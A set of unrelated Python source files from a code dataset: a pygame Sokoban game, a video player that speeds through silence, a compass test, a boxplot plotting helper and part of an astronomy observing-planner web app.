global iotmap
for istage in range(tiley):
iotmap.append(iotstage[stagenum][istage][:])
def iotsetcaption(caption):
pygame.display.set_caption(caption)
def iotdraw():
global manx
global many
global stageend
DISPLAYSURF.fill(WHITE)
stageend = True
for ix in range(tilex):
for iy in range(tiley):
if '#' == iotmap [iy][ix]:
DISPLAYSURF.blit(iotwall, (ix * pixelx, iy * pixely))
elif '@' == iotmap [iy][ix]:
manx = ix
many = iy
DISPLAYSURF.blit(iotman, (ix * pixelx, iy * pixely))
elif '1' == iotmap [iy][ix]:
DISPLAYSURF.blit(iotobj1, (ix * pixelx, iy * pixely))
if '2' != iotstage[stagenum][iy][ix]:
stageend = False
elif '2' == iotmap [iy][ix]:
DISPLAYSURF.blit(iotobj2, (ix * pixelx, iy * pixely))
pygame.init()
iotsetcaption("Sokoban")
DISPLAYSURF = pygame.display.set_mode((displayx, displayy), 0, 32)
iotloadmap()
while True:
iotdraw()
pygame.display.update()
if True == stageend:
DISPLAYSURF.blit(clear, (120, 60))
pygame.display.update()
keyinput = False
while True:
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
keyinput = True
break
if True == keyinput:
break
time.sleep(0.1)
continue
stagenum = stagenum + 1
iotmap = []
for istage in range(tiley):
iotmap.append(iotstage[stagenum][istage][:])
iotcount = 0
iotsetcaption("Sokoban [Stage : %d][move : %d]" % (stagenum + 1, iotcount))
continue
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
tempx = manx
tempy = many
if event.key == pygame.K_UP:
iotman = iotmanU
many = many-1
elif event.key == pygame.K_DOWN:
iotman = iotmanD
many = many+1
elif event.key == pygame.K_LEFT:
iotman = iotmanL
manx = manx-1
elif event.key == pygame.K_RIGHT:
iotman = iotmanR
manx = manx+1
elif event.key == pygame.K_r:
iotcount = 0
iotsetcaption("Sokoban [Stage : %d][move : %d]" % (stagenum + 1, iotcount))
iotmap = []
for istage in range(tiley):
iotmap.append(iotstage[stagenum][istage][:])
break
else:
continue
if '#' != iotmap[many][manx]:
if '1' == iotmap[many][manx]:
if ' ' == iotmap[2 * many - tempy][2 * manx - tempx]:
iotmap[2 * many - tempy][2 * manx - tempx] = '1'
elif '2' == iotmap[2 * many - tempy][2 * manx - tempx]:
iotmap[2 * many - tempy][2 * manx - tempx] = '1'
else:
manx = tempx
many = tempy
continue
if '2' == iotstage[stagenum][tempy][tempx]:
iotmap[tempy][tempx] = '2'
else:
iotmap[tempy][tempx] = ' '
iotmap[many][manx] = '@'
iotcount = iotcount + 1
iotsetcaption("Sokoban [Stage : %d][move : %d]" % (stagenum + 1, iotcount))
else:
manx = tempx
many = tempy
elif event.type == pygame.QUIT:
pygame.quit()
sys.exit() | StarcoderdataPython |
1785995 | import numpy as np
import click
import time
import pygame
import pygame.locals as pyloc
import librosa as lr
import ffmpeg
import logging
import re
import pyaudio
import subprocess
import json
import os
import signal
import pdb
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger(__name__)
playlog = log.getChild('playback')
class PlayArgs:
def __init__(self, mouse_pos, position_offset, window_size, speed,
normal_speed, pause, set_bookmark, goto_bookmark, exit):
self.goto_bookmark = goto_bookmark
self.set_bookmark = set_bookmark
self.normal_speed = normal_speed
self.window_size = window_size
self.speed = speed
self.exit = exit
self.pause = pause
self.mouse_pos = mouse_pos
self.position_offset = position_offset
def got_command(self):
return self.pause or self.mouse_pos or self.position_offset or \
self.exit or self.speed or self.window_size or \
self.normal_speed or self.set_bookmark or self.goto_bookmark
# TODO log what the minimum and maximum time that could be required before
# the silence cutter can kick in based on the BLOCK_LENGTH speed etc.
# TODO put video playback into separate process to reduce lag
# TODO if a command is issued always draw the stats surface for the specified
# amount of time
# Fixme if the playback speed is less than one, after some time a buffer
# underflow exception is raised
# TODO create fadein fadeout effect for stats bar
# TODO make it so that you can see the playbar always without resizing
# TODO make it so that you can only scrub through the timeline when you are on it
# TODO make it so that the time of a point on the progressbar is displayed when
# you hover over the progressbar
# TODO enable selection of which audiotrack to play
# TODO Make it so that you can install via pip (the executable)
# (use setuptools? look at click documentation)
# TODO create tests for different file types
# FIXME when reaching the end of a .ts file that is currently being written
# the video resets to the position of the play_from parameter play_from_pos
# was invoked with. This happens when the speed is 2 and the difference
# between video_position and length_of_file is too small.
# TODO allow fractional speed
# TODO make it work for audio files
# TODO create command line documentation on controls in window
# TODO add speed modifiers in timeline
# IFNEEDED create audio syncpoints. Prestart new audio and video streams
# (or only one of them) and then switch to them at a specific sync point
# (some point in time)
# IFNEEDED reimplement the simple unbuffered speedup procedures
# (because they run faster and do not lag)
# NICE you can stream youtube videos
# TODO Write tests for this buffer
class NumpyBuffer:
def __init__(self, size, dtype):
self.buffer = np.zeros(size, dtype=dtype)
self._buffer_len = size
self._write_idx = 0
self._read_idx = 0
self._fill_level = 0
@property
def fill_level(self):
return self._fill_level
@fill_level.setter
def fill_level(self, value):
if value > self._buffer_len:
raise Exception("Buffer overflow")
if value < 0:
raise Exception("Buffer underflow")
self._fill_level = value
def peek(self, n):
if n > self._buffer_len * 2:
raise Exception("Can't read more than twice the buffer size.")
rem = self._remaining_read_capacity()
if n <= rem:
return self.buffer[self._read_idx:n + self._read_idx]
else:
rem_n = n - rem
a = self.buffer[self._read_idx:]
b = self.buffer[:rem_n]
return np.concatenate((a, b))
def read(self, n):
r = self.peek(n)
self.advance_r(n)
return r
def write(self, arr):
if len(arr) > self._buffer_len * 2:
raise Exception("Can't write more than twice the buffer size.")
arr_len = len(arr)
if arr_len <= (self._buffer_len - self._write_idx):
self.buffer[self._write_idx:self._write_idx + arr_len] = arr
else:
rem = self._remaining_write_capacity()
self.buffer[self._write_idx:] = arr[:rem]
rem_a = len(arr) - rem
self.buffer[:rem_a] = arr[rem:]
self._advance_w(arr_len)
def _remaining_write_capacity(self):
return self._buffer_len - self._write_idx
def _remaining_read_capacity(self):
return self._buffer_len - self._read_idx
def _advance_w(self, x):
self.fill_level += x
self._write_idx = (self._write_idx + x) % self._buffer_len
def advance_r(self, x):
self.fill_level -= x
self._read_idx = (self._read_idx + x) % self._buffer_len
def test_buffer():
b = NumpyBuffer(16, np.float32)
    for i in range(100):
        arr = np.array([1, 2, 8], dtype=np.float32)
        b.write(arr)
        # peek should not consume the data; read should
        assert (b.peek(3) == arr).all()
        assert (b.read(3) == arr).all()
class EventManager:
def __init__(self, speed):
signal.signal(signal.SIGINT, self.set_exit)
signal.signal(signal.SIGTERM, self.set_exit)
self.exit = None
self.time_last_mouse_move = 0
self.last_mouse_pos = None
self.last_vid_resize = None
self.speed = speed
def set_exit(self, signum, frame):
self.exit = True
log.debug('Exit flag set')
def handle_events(self, screen_size, stats_survace_x_size):
events = pygame.event.get()
play_offset = None
pause = None
speed_changed = False
window_size = None
mouse_button_on_stats_surf = None
screen_adjusted = False
normal_speed = False
set_bookmark = None
goto_bookmark = None
b = None
mouse_pos = pygame.mouse.get_pos()
if mouse_pos != self.last_mouse_pos:
self.last_mouse_pos = mouse_pos
self.time_last_mouse_move = time.time()
self.mouse_moved = True
else:
self.mouse_moved = False
ctrl_down = pygame.key.get_mods() & pygame.KMOD_CTRL
shift_down = pygame.key.get_mods() & pygame.KMOD_SHIFT
jump_coef = 2 if ctrl_down else 1
jump_coef *= 0.5 if shift_down else 1
for event in events:
if event.type == pyloc.QUIT:
self.set_exit(None, None)
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
self.set_exit(None, None)
elif event.key == pygame.K_SPACE:
pause = True
elif event.key == pygame.K_LEFT:
play_offset = -10 * self.speed * jump_coef
elif event.key == pygame.K_RIGHT:
play_offset = 10 * self.speed * jump_coef
elif event.key in [pygame.K_KP_PLUS, pygame.K_PLUS]:
self.speed = self.speed * 1.1
speed_changed = True
elif event.key in [pygame.K_KP_MINUS, pygame.K_MINUS]:
self.speed = self.speed * 0.9
speed_changed = True
elif event.key == pygame.K_r:
normal_speed = True
if event.key == pygame.K_0: b = 0
if event.key == pygame.K_1: b = 1
if event.key == pygame.K_2: b = 2
if event.key == pygame.K_3: b = 3
if event.key == pygame.K_4: b = 4
if event.key == pygame.K_5: b = 5
if event.key == pygame.K_6: b = 6
if event.key == pygame.K_7: b = 7
if event.key == pygame.K_8: b = 8
if event.key == pygame.K_9: b = 9
                if b is not None:
                    if pygame.key.get_mods() & pygame.KMOD_CTRL:
                        set_bookmark = b
                    else:
                        goto_bookmark = b
elif event.type == pygame.MOUSEBUTTONDOWN:
if mouse_pos[1] > screen_size[1] - stats_survace_x_size:
mouse_button_on_stats_surf = True
else:
pause = True
if event.type == pyloc.VIDEORESIZE:
self.last_vid_resize = event.dict['size']
screen_adjusted = True
log.debug(f'resize: {self.last_vid_resize}')
if not screen_adjusted and self.last_vid_resize:
window_size = self.last_vid_resize
self.last_vid_resize = None
pygame.display.flip()
speed = self.speed if speed_changed else None
mouse_pos = mouse_pos if mouse_button_on_stats_surf else None
return PlayArgs(mouse_pos, play_offset, window_size,
speed, normal_speed, pause, set_bookmark,
goto_bookmark, self.exit)
class AudioPlayer:
def __init__(self, pyaudio_instance, audio_sr, speed, silence_speedup,
file, play_from, ffmpeg_loglevel, volume, audio_channel):
self.volume = volume
self.pyaudio_instance = pyaudio_instance
self.audio_sr = audio_sr
self.speed = speed
self.silence_speedup = silence_speedup
self.file = file
self.play_from = play_from
self.ffmpeg_loglevel = ffmpeg_loglevel
self.BLOCK_LENGTH = 1024 * 24
self.AUDIO_DROP_SKIP_DURATION = \
self.BLOCK_LENGTH / audio_sr / speed * silence_speedup / 2
self.AUDIO_THRESHHOLD = 0.1
self.HORIZON_COEF = 4
self.FRAME_LENGTH = \
int(self.BLOCK_LENGTH * self.HORIZON_COEF * self.speed)
self.ADVANCE_LENGTH = int(self.BLOCK_LENGTH * self.speed)
self.n_droped = 0
self.audio_stream = create_ffmpeg_audio_stream(
file, play_from, ffmpeg_loglevel, audio_channel)
self.buff = NumpyBuffer(self.FRAME_LENGTH * 20, np.float32)
i = np.frombuffer(
self.audio_stream.stdout.read(self.FRAME_LENGTH * 4),
np.float32)
self.buff.write(i)
self.audio_out_stream = pyaudio_instance.open(
format=pyaudio.paFloat32,
channels=1,
rate=audio_sr * 2,
frames_per_buffer=self.BLOCK_LENGTH,
output=True,
stream_callback=self._callback_ff
)
self.first_callback = True
self.trigger_last_write = False
self.last_write_triggered = False
playlog.debug('Audioplayer started')
def _callback_ff(self, in_data, frame_count, time_info, status):
while self.buff.fill_level < self.FRAME_LENGTH * 2:
s = self.audio_stream.stdout.read(self.ADVANCE_LENGTH * 4)
if len(s) == 0:
playlog.debug("Audiostream end reached")
return None, pyaudio.paComplete
i = np.frombuffer(s, np.float32)
self.buff.write(i)
frame_1 = self.buff.peek(self.FRAME_LENGTH)
self.buff.advance_r(self.ADVANCE_LENGTH)
frame_2 = self.buff.peek(self.FRAME_LENGTH)
data1 = lr.effects.time_stretch(
frame_1, self.speed, center=False)
data2 = lr.effects.time_stretch(
frame_2, self.speed, center=False)
a1 = data2[:self.BLOCK_LENGTH]
a2 = np.linspace(0, 1, self.BLOCK_LENGTH)
a = a1 * a2
b1 = data1[self.BLOCK_LENGTH:self.BLOCK_LENGTH*2]
b2 = np.linspace(1, 0, self.BLOCK_LENGTH)
b = b1 * b2
data = (a + b).astype('float32')
# Drop silence
if self.silence_speedup > 1 and \
(self.buff.peek(int(self.BLOCK_LENGTH * (self.silence_speedup - 1) * self.speed)) <
self.AUDIO_THRESHHOLD).all():
self.buff.advance_r(int(self.BLOCK_LENGTH * (self.silence_speedup - 1)))
self.n_droped += 1
if self.first_callback:
self.first_callback = False
data = (data * self.volume * np.linspace(0, 1, self.BLOCK_LENGTH)).astype('float32')
return data, pyaudio.paContinue
elif self.trigger_last_write:
data = (data * self.volume * np.linspace(1, 0, self.BLOCK_LENGTH)).astype( 'float32')
self.last_write_triggered = True
return data, pyaudio.paComplete
else:
return data * self.volume, pyaudio.paContinue
def close(self):
self.trigger_last_write = True
time.sleep(0.3)
self.audio_out_stream.close()
self.audio_stream.kill()
def sec_to_time_str(x):
m, s = divmod(x, 60)
h, m = divmod(m, 60)
return f'{int(h):02}:{int(m):02}:{int(s):02}'
def get_stats_surf(playbar_offset_pix, x_size, screen_resolution, playbacktime,
total_media_length, speed, silence_speedup):
FONT_SIZE = 20
FONT_COLOR = (200, 200, 200)
font = pygame.font.SysFont(None, FONT_SIZE)
x, y = screen_resolution[0], x_size
pos = screen_resolution[0] - x, screen_resolution[1] - y
surf = pygame.Surface((x, y))
surf.set_alpha(200)
ratio_played = playbacktime / total_media_length
outline = pygame.Rect(playbar_offset_pix[0], playbar_offset_pix[1],
x - playbar_offset_pix[0] * 2,
y - playbar_offset_pix[1] * 2)
progress = outline.copy()
progress.width = outline.width * ratio_played
OUTLINE_THICKNESS = 2
outline.height -= OUTLINE_THICKNESS / 2
outline.width -= OUTLINE_THICKNESS / 2
a = 50
pygame.draw.rect(surf, (a, a, a), outline, OUTLINE_THICKNESS)
pygame.draw.rect(surf, (255, 255, 255), progress)
# TIMINGS
PADING = 3
text = font.render(f' {sec_to_time_str(playbacktime)}', True, FONT_COLOR)
surf.blit(text, (PADING, PADING))
time_remaining = sec_to_time_str(
(total_media_length - playbacktime) / speed)
text = font.render(f'-{time_remaining}', True, FONT_COLOR)
surf.blit(text, (PADING, y / 2 - PADING - FONT_SIZE / 5))
text = font.render(f' {sec_to_time_str(total_media_length)}', True,
FONT_COLOR)
surf.blit(text, (PADING, y - PADING - FONT_SIZE / 1.5))
# Settings
text = font.render(f'sp: {speed:01.2f}', True, FONT_COLOR)
surf.blit(text, (x - FONT_SIZE + PADING - 42, PADING))
# text = font.render(f' {speed}', True, FONT_COLOR)
# surf.blit(text, (x - FONT_SIZE + PADING, PADING))
text = font.render(f's-sp: {silence_speedup:01}', True, FONT_COLOR)
surf.blit(text, (x - FONT_SIZE + PADING - 42, y - PADING - FONT_SIZE / 1.5))
return surf, pos
def create_ffmpeg_video_stream(file, ss, ffmpeg_loglevel, frame_rate):
read_proc = (
ffmpeg
.input(file, ss=ss, loglevel=ffmpeg_loglevel)
.output('pipe:', format='rawvideo', pix_fmt='rgb24', r=frame_rate)
.run_async(pipe_stdout=True)
)
return read_proc
def create_ffmpeg_audio_stream(file, ss, ffmpeg_loglevel, audio_channel=0):
read_proc = (
ffmpeg
.input(file, ss=ss, loglevel=ffmpeg_loglevel)
.output('pipe:', format='f32le', acodec='pcm_f32le',
map=f'0:a:{audio_channel}')
.run_async(pipe_stdout=True)
)
return read_proc
def play_from_pos(file, screen, screen_resolution, video_resolution,
pyaudio_instance, audio_sr, volume, audio_channel,
frame_rate, speed, play_from, silence_speedup,
ffmpeg_loglevel, event_manager, input_length,
playbar_offset_pix, stats_surface_x_size):
v_width, v_height = video_resolution
playlog.debug("Starting video stream.")
video_stream = create_ffmpeg_video_stream(file, play_from, ffmpeg_loglevel,
frame_rate)
audio_player = AudioPlayer(pyaudio_instance, audio_sr, speed,
silence_speedup, file, play_from,
ffmpeg_loglevel, volume, audio_channel)
def cleanup():
audio_player.close()
video_stream.kill()
def get_video_position(curr_idx, frame_rate, play_from):
return curr_idx / frame_rate + play_from
playlog.debug("starting playback")
start_time = time.time()
curr_idx = 0
playback_offset = 0
while True:
ret = event_manager.handle_events(screen_resolution,
stats_surface_x_size)
video_position = get_video_position(curr_idx, frame_rate, play_from)
if video_position > input_length:
input_length = get_file_length(file)
if ret.got_command():
draw_stats_surf(input_length, playbar_offset_pix, screen,
screen_resolution, silence_speedup, speed,
stats_surface_x_size, video_position)
cleanup()
return False, video_position, ret
playback_time = time.time() - start_time + playback_offset
playback_offset += audio_player.AUDIO_DROP_SKIP_DURATION * \
(audio_player.n_droped * VIDEO_SKIP_COEF)
audio_player.n_droped = 0
frame_idx = int(playback_time * frame_rate * speed)
if curr_idx >= frame_idx:
continue
while curr_idx < frame_idx:
video_stream.stdout.read(v_width * v_height * 3)
curr_idx += 1
in_bytes = video_stream.stdout.read(v_width * v_height * 3)
curr_idx += 1
if len(in_bytes) == 0:
playlog.info("Video steam empty, stopping playback")
draw_stats_surf(input_length, playbar_offset_pix, screen,
screen_resolution, silence_speedup, speed,
stats_surface_x_size, video_position)
cleanup()
return True, video_position, ret
in_frame = (
np
.frombuffer(in_bytes, np.uint8)
.reshape([v_height, v_width, 3])
.transpose([1, 0, 2])
)
frame_surf = pygame.surfarray.make_surface(in_frame)
# if not video_resolution == screen_resolution:
frame_surf = pygame.transform.scale(frame_surf, screen_resolution)
screen.blit(frame_surf, (0, 0))
if time.time() - event_manager.time_last_mouse_move < 2:
draw_stats_surf(input_length, playbar_offset_pix, screen,
screen_resolution, silence_speedup, speed,
stats_surface_x_size, video_position)
pygame.display.flip()
raise Exception("Invalid programm state")
def draw_stats_surf(input_length, playbar_offset_pix, screen,
screen_resolution, silence_speedup, speed,
stats_surface_x_size, video_position):
stats_surf, pos = get_stats_surf(playbar_offset_pix, stats_surface_x_size,
screen_resolution, video_position,
input_length, speed, silence_speedup)
screen.blit(stats_surf, pos)
# =============================================================================
# STARTUP
# =============================================================================
def get_file_resolution(file):
r = subprocess.run(["ffprobe", "-v", "error", "-select_streams", "v:0",
f"-show_entries", "stream=width,height",
f"-of", "csv=s=x:p=0", file],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
res = re.match(r'(\d+)x(\d+)\n?', r.stdout.decode('utf-8'))
if not res:
raise Exception(f"Could not infer resolution from ffprobe output {r}.")
return int(res.group(1)), int(res.group(2))
def get_file_length(file):
r = subprocess.run(["ffprobe", "-v", "error", "-show_entries",
"format=duration", "-of",
"default=noprint_wrappers=1:nokey=1", file],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
try:
return float(r.stdout)
except Exception as e:
log.error("Could not extract file length.")
raise
SPEED_DEFAULT = 1.8
SILENCE_SPEEDUP_DEFAULT = 5
@click.command()
@click.argument('file',
type=click.Path(True, dir_okay=False, resolve_path=True))
@click.option('-s', '--speed', type=float, default=SPEED_DEFAULT, show_default=True,
help='How fast to playback.')
@click.option('-b', '--silence-speedup', default=SILENCE_SPEEDUP_DEFAULT, type=int,
show_default=True,
help="How much faster to play silence. This is in addition to "
"the speedup specified with --speed.")
@click.option('-v', '--volume', type=float, default=1, show_default=True,
help='Playback volume of audio.')
@click.option('--audio-channel', type=int, default=0, show_default=True,
help='The audio channel to play back.')
@click.option('--play-from', type=int, default=None, show_default=True,
help='Where to start playback in seconds. Overwrites loaded '
'playback location.')
@click.option('--frame-rate', type=int, default=15, show_default=True,
help='The framerate to play the video back at. Low values '
'improve performance.')
@click.option('-r', '--init-screen-res', type=int, nargs=2,
default=(1885, 1012),
show_default=True,
help='What resolution should the input be stretched to '
'initially.')
@click.option('-r', '--max-screen-res', type=int, nargs=2,
default=(1920, 1080),
show_default=True,
help='The maximum resolution that the screen can take.')
@click.option('--no-save-pos', is_flag=True,
help='Disable loading and saving of the playback position.')
@click.option('--ffmpeg-loglevel', default='warning', show_default=True,
help="Set the loglevel of ffmpeg.")
def main(file, speed, play_from, frame_rate, volume, audio_channel,
init_screen_res, max_screen_res,
silence_speedup, no_save_pos, ffmpeg_loglevel):
"""
Runtime commands
Space Pause playback
      left_arrow   Seek backwards 10 seconds (scaled by playback speed)
      right_arrow  Seek forward 10 seconds (scaled by playback speed)
mouse_click Jump to position in timeline at mouse position
plus Increase playback speed 10%
minus Decrease playback speed 10%
      r            toggle between set speed and speed 1
Esc Exit the application
"""
if silence_speedup < 1:
raise Exception(f"--silence-speedup needs to be an integer greater "
f"than zero.")
if speed < 1:
raise Exception(f"speeds under 1 are not supported right now as they "
f"lead to a sound buffer underflow for some reason.")
VIDEO_PLAYBACK_SAVE_FILE = \
f'{os.path.dirname(__file__)}/playback_positions.json'
STATS_SURFACE_X_SIZE = 1080//20
SEEKBACK_ON_RESUME = 1
log.debug(f'Video pos save file {VIDEO_PLAYBACK_SAVE_FILE}')
pyaudio_instance = pyaudio.PyAudio()
pygame.init()
screen = pygame.display.set_mode(max_screen_res,
pygame.HWSURFACE | pygame.DOUBLEBUF | pygame.RESIZABLE)
pygame.display.set_caption(f'bepl {file}')
audio_sr = lr.get_samplerate(file)
log.debug(f'Audio sample-rate of {audio_sr} inferred.')
input_resolution = get_file_resolution(file)
log.debug(f'Video resolution infered {input_resolution}')
input_length = get_file_length(file)
n_input_length = None
if not play_from:
play_from = 0
if not play_from and not no_save_pos:
play_from = load_playback_pos(VIDEO_PLAYBACK_SAVE_FILE, file)
PLAYBAR_OFFSET_PIX = (70, 10)
event_manager = EventManager(speed)
cmd = {'file': file,
'screen': screen,
'screen_resolution': init_screen_res,
'video_resolution': input_resolution,
'audio_sr': audio_sr,
'frame_rate': frame_rate,
'speed': speed,
'play_from': play_from,
'silence_speedup': silence_speedup,
'pyaudio_instance': pyaudio_instance,
'ffmpeg_loglevel': ffmpeg_loglevel,
'event_manager': event_manager,
'input_length': input_length,
'playbar_offset_pix': PLAYBAR_OFFSET_PIX,
'volume': volume,
'audio_channel': audio_channel,
'stats_surface_x_size': STATS_SURFACE_X_SIZE,
}
while True:
while True:
stream_ended, vid_pos, new_cmd = play_from_pos(**cmd)
n_input_length = get_file_length(file)
if not stream_ended or input_length == n_input_length:
input_length = n_input_length
cmd['input_length'] = input_length
break
else:
input_length = n_input_length
cmd['input_length'] = input_length
if new_cmd.exit:
if not no_save_pos:
save_playback_pos(VIDEO_PLAYBACK_SAVE_FILE, file, vid_pos)
break
cmd['play_from'] = vid_pos
if new_cmd.window_size:
init_screen_res = new_cmd.window_size
cmd['screen_resolution'] = init_screen_res
if new_cmd.pause or stream_ended:
log.debug("Paused or stream end reached, waiting for command.")
cmd['play_from'] -= SEEKBACK_ON_RESUME
while True:
time.sleep(0.1)
new_cmd = event_manager.handle_events(cmd['screen_resolution'],
STATS_SURFACE_X_SIZE)
if new_cmd.got_command():
break
if new_cmd.speed:
if new_cmd.speed < 1:
log.warning(
f"Speeds under 1 are not supported right now as they "
f"lead to a sound buffer underflow for some reason.")
cmd['speed'] = 1
speed = 1
else:
speed = new_cmd.speed
cmd['speed'] = new_cmd.speed
if new_cmd.normal_speed:
if cmd['speed'] == 1:
cmd['speed'] = speed
else:
cmd['speed'] = 1
if new_cmd.position_offset:
cmd['play_from'] = \
np.clip(vid_pos + new_cmd.position_offset,
0,
input_length - 0.5)
if new_cmd.mouse_pos:
zeroed = new_cmd.mouse_pos[0] - PLAYBAR_OFFSET_PIX[0]
scaled = zeroed / (
init_screen_res[0] - PLAYBAR_OFFSET_PIX[0] * 2)
cmd['play_from'] = np.clip(scaled * input_length,
0,
input_length - 0.5)
pyaudio_instance.terminate()
pygame.display.quit()
#TODO implement bookmarking
def save_playback_position():
pass
def load_playback_position():
pass
def load_playback_pos(save_file, video_file, seek_back=2):
if not os.path.isfile(save_file):
return 0
with open(save_file) as f:
data = json.load(f)
if video_file in data.keys():
play_from = data[video_file]
else:
play_from = 0
log.debug(f'Loaded playback time of {video_file}')
return max(0, play_from - seek_back)
def save_playback_pos(save_file, video_file, vid_pos):
new_save = {video_file: vid_pos}
data = {}
if os.path.isfile(save_file):
with open(save_file, 'r') as f:
data = json.load(f)
data.update(new_save)
with open(save_file, 'w') as f:
json.dump(data, f)
log.debug(f'Saved playback time of {video_file}')
if __name__ == '__main__':
VIDEO_SKIP_COEF = 0.75
main()
| StarcoderdataPython |
3320786 | import sys
import fake_rpi
sys.modules['smbus2'] = fake_rpi.smbus
from gamutrf import compass
def test_compass_bearing():
bearing = compass.Bearing()
bearing.get_bearing()
| StarcoderdataPython |
1754411 | import matplotlib.pyplot as plt
import time as timelib
def boxplot(session_data, cluster_type, features, filename = None,verbose = False):
"""
    Plot boxplots of the session features given as input
    Parameters
    ----------
    session_data: pandas dataframe of requests
    cluster_type: string, column of session_data holding the cluster id
    features: list of strings, the features to plot
    filename: string or None, if given the figure is saved to './<filename>.pdf'
    verbose: bool, print timing information
Returns
-------
None
"""
    if verbose:
start_time = timelib.time()
print("\n * Plotting boxplots ...")
n_plots = len(features)
fig,ax=plt.subplots(1,n_plots,figsize=(16,4))
axis_counter=0
cluster_ids = session_data[cluster_type].unique()
cluster_ids.sort()
for feature in features:
feature_boxplot_data = []
for c_id in cluster_ids:
feature_boxplot_data.append(session_data[session_data[cluster_type]==c_id][feature].values)
ax[axis_counter].boxplot(feature_boxplot_data,showfliers=False)
ax[axis_counter].set_xticklabels(cluster_ids)
for tick in ax[axis_counter].xaxis.get_major_ticks():
tick.label.set_fontsize(10)
for tick in ax[axis_counter].yaxis.get_major_ticks():
tick.label.set_fontsize(10)
ax[axis_counter].set_title(features[axis_counter])
axis_counter+=1
ax[2].set_xlabel('\nCluster',fontsize=18)
plt.tight_layout()
if filename is not None:
plt.savefig('./%s.pdf'%filename)
plt.show()
plt.clf()
plt.close()
if verbose == True:
print(" Boxplots plotted in %.1f seconds."%(timelib.time() - start_time))
return; | StarcoderdataPython |
135822 | <reponame>WWGolay/gemini-tools<filename>obsplanner.py
#!/usr/bin/env python
# coding: utf-8
'''
obsplanner: IRO Observing planner. Uses web interface.
N.B. libraries astroplan, pywebio, jplephem must be installed.
*** NB requires astroquery version 4.3+ [this is required for JPL Horizons planet lookup to work correctly]
v. 0.9 3 Feb 2022 RLM
'''
import numpy as np
from astropy.time import Time
from obsplanner_lib import obs_planner
from obsplanner_utilities import get_inputs, get_recommendation
import matplotlib
import matplotlib.pyplot as plt
#from pywebio.input import *
from pywebio.output import put_text, put_image, put_buttons, put_table, put_link
from pywebio import config,start_server
from pywebio.input import TEXT, FLOAT
import pywebio.input as pywebio_input
import pywebio.session as session
import astropy.units as u
from astropy.coordinates import Angle, SkyCoord, EarthLocation, get_moon, solar_system_ephemeris, get_body
import warnings
matplotlib.use('agg') # required, use a non-interactive backend
warnings.filterwarnings("ignore") # Suppress warning from axis projections
# Choose a pretty theme (current choices: dark, yeti,sketchy, minty)
theme = 'dark'
if theme == 'dark':
title_style ='color: yellow'
else:
title_style ='color: black'
warning_style = 'color:red'
# Set title that appears in web tab
@config(title='Iowa Robotic Observatory Observing Planner',theme=theme)
def main():
# Define constants
arcsec = np.pi/(180*3600)
# Add a banner
iro_banner = '/home/www/cgi-bin/astrolab/iro-banner.png'
#iro_banner= 'iro-banner.png'
put_image( open(iro_banner, 'rb').read() )
# TBD Add link to JPL Horizons web tool
# put_link('Inputs (Click for compatible solar system object names',url='https://ssd.jpl.nasa.gov/horizons/app.html#/')
# Get inputs from webpage
object_name, telescope, obsdate, myfilter, seeing, detailed = get_inputs()
detailed = detailed != []
myfilter = myfilter.upper()
fwhm = seeing * arcsec # Convert to radians
time = Time(obsdate, scale='utc')
# Set camera and gain mode
if 'Gemini' in telescope:
camera = 'AC4040'
mode = 'Spro' # Fixed mode (for now) to Spro only
else:
camera = 'SBIG6303'
mode = 'Default'
# Instantiate obs_planner class
B = obs_planner(telescope, camera, object_name, myfilter, fwhm, time)
# Get some observer, object info
observer, obsname, obscode, description, min_elevation = B.observatory_info()
coords, coords_string, magnitude, objtype, is_extended, diameter, sp_type, \
moon_illum, moon_angle, solar_system_object = B.object_info()
# Warn if object is below minimum observable elevation for entire night: User needs to refresh page and start over
def reset_form(dummy):
session.run_js('window.close()')
object_up_times, object_up_hrs = B.object_up()
if object_up_hrs == 0:
s1 = '%s is below minimum observable elevation, cannot observe from %s. ' %\
(object_name,telescope)
s2 = 'Refresh webpage to start over'
s = s1+s2
put_buttons([dict(label=s, value='dummy',color='danger')], onclick=reset_form)
session.hold()
# Get magnitude from user if magnitude lookup wasn't successful
    if magnitude is None or np.isnan(magnitude):
put_text(' ')
magnitude = pywebio_input.input('Could not find a magnitude for %s, please enter:' % object_name,type=FLOAT)
B.set_magnitude(magnitude)
# Report coordinates, object identification, number of hours object is above minimum elevation
put_text(' ')
put_text('Summary Information').style(title_style)
put_text('%s Coordinates(J2000): %s' % (object_name, coords_string))
if is_extended:
put_text('Object type: %s, Magnitude = %.1f, diameter %.1f arcmin' % (objtype,magnitude,diameter))
else:
put_text('Object type: %s, Magnitude = %.1f ' % (objtype, magnitude))
put_text('%s is above minimum elevation (%i deg) for %.1f hours' % (object_name, min_elevation, object_up_hrs))
# Report moon stats, proximity to object; warn user if close
if detailed:
put_text('Moon illumination: %i%%' % ( moon_illum*100))
put_text('Moon separation from object %s: %i\N{DEGREE SIGN}' % (object_name, moon_angle))
if moon_illum > 0.50 and moon_angle < 45 and object_name.casefold() != 'Moon'.casefold():
put_text('WARNING: Moon is bright and close to your object (%i degrees). \
This will likely adversely affect image quality' % moon_angle).style(warning_style)
# Rise/set table sunrise, sunset defined by solar elev = -12 deg; object rise/set define by observatory's min. elev.
put_text('Rise and Set Times for Sun, Moon, %s at %s' % (object_name, obsname) ).style(title_style)
A = B.rise_set_table()
put_table(A[1:], header = A[0])
# Coordinates table if solar system object
if detailed and solar_system_object:
put_text('Coordinates vs. UT (querying JPL Horizons...)').style(title_style)
A = B.coordinates_table(ntimes_per_hr =2)
put_table(A[1:], header = A[0])
# Display clear sky plot from ClearDarkSky website if observing is for tonight and observer requests detailed view
if detailed:
put_text(' ')
put_text('Clear Sky predicted observing conditions for next several nights').style(title_style)
if 'Gemini' in telescope:
clearsky_image = 'https://www.cleardarksky.com/c/WnrObAZcsk.gif?c=1159225'
clearsky_webpage ='http://www.cleardarksky.com/c/WnrObAZkey.html'
put_image(clearsky_image)
else:
clearsky_image = 'https://www.cleardarksky.com/c/IwCtyIAcsk.gif?c=1764035'
clearsky_webpage ='http://www.cleardarksky.com/c/IwCtyIAkey.html'
put_image(clearsky_image)
put_link('Click to visit ClearSky webpage for more details',url=clearsky_webpage,new_window=True)
# Plot airmass vs time
put_text(' ')
